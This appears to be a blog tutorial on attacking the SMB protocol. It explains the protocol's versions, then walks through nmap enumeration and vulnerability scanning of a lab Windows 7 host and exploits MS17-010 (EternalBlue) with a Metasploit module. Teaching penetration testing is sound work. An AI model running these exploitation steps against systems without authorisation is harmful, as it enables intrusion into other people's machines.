Understanding SMB
SMB is a network file and resource sharing protocol, which
follows client server model. Any client present in a network can communicate
with the SMB server to access resources such as files and directories or assign
task like printing over the network.
How SMB Works?
SMB communication is not difficult to understand, where the SMB client connects to an SMB server using SMB port (445 for new version, old version used 139) and access the shares. Once the client gets the access to the shares, it can collaborate the share with its current system and use the files without downloading them to their machines or print using a network printer.
Versions of SMB
SMB v1: The first version of SMB. It began in 1980 and gone
through multiple changes. Microsoft first implemented SMBv1 in Windows 95 by
introducing CIFS(Common Internet File System). This version of SMB is highly
vulnerable that it is never being suggested to use in modern network
communication. Because it uses no encryption, which has been exploited by
Wannacry and NotPetya like ransomware attacks.
SMBv2: This version was introduced with windows Vista. It
improved the performance and offered security enhancement as compare to
previous version. Later 2.1 version was introduced in windows 7 and windows
server 2008 R2. Which has oplocks (Optimistic Locks) as a feature.
SMBv3: This is the latest and most secure version of SMB so
far. It provides end-to-end encryption while communicating with the client. It first
came up with windows 8 and server 2012, later v3.2 was introduced in 8.1 and
Server 2012 R2. The latest update is 3.1.1 which is using in windows 10 and
server 2016.
Enumeration:
In this phase as pentester one should look for the following
information from SMB service:
-
Banner grabbing
-
User Listing
-
User Workgroup
-
Network Share information
-
Remote Operating system
-
SMB security version
To get the above detail we are using popular network
scanning tool nmap.
nmap –p
445,139 –A 192.168.1.10
The information we get from the result is:
Operating System: Windows 7
Ultimate
Computername: WIN-8KGN3AE06PK
SMB Security Mode: 2.02
Scanning for vulnerabilities:
After enumeration we get the version information and the
host operation system. Now it is time for vulnerability scanning. Again we are
using nmap to do so. As nmap is having end number of scripts to identify
vulnerability.
nmap
- - script smb-vuln* -p 445 192.168.1.10
The scanning results shows the host is highly vulnerable to eternalblue(Ms17-010) vulnerability due to SMBv1.
Exploiting SMB vulnerability:
Now we have the vulnerability information so we will exploit
the vulnerability using metasploit and gain the privilege.
We run the following modules in our attacker system:
> msfconsole
> use exploit/windows/smb/ms17_010_eternalblue
> set rhost <Victim IP>
> exploit
-
Closing words:
This is not the only way to exploiting SMB as there are
other ways like PSExec, Bruteforce , NTLM capture.
I feel the above technique is not that complex, as
Metasploit always makes hackers life easy.
I hope you find this article valuable and helpful. Happy
Hacking!!
0 comments:
New comments are not allowed.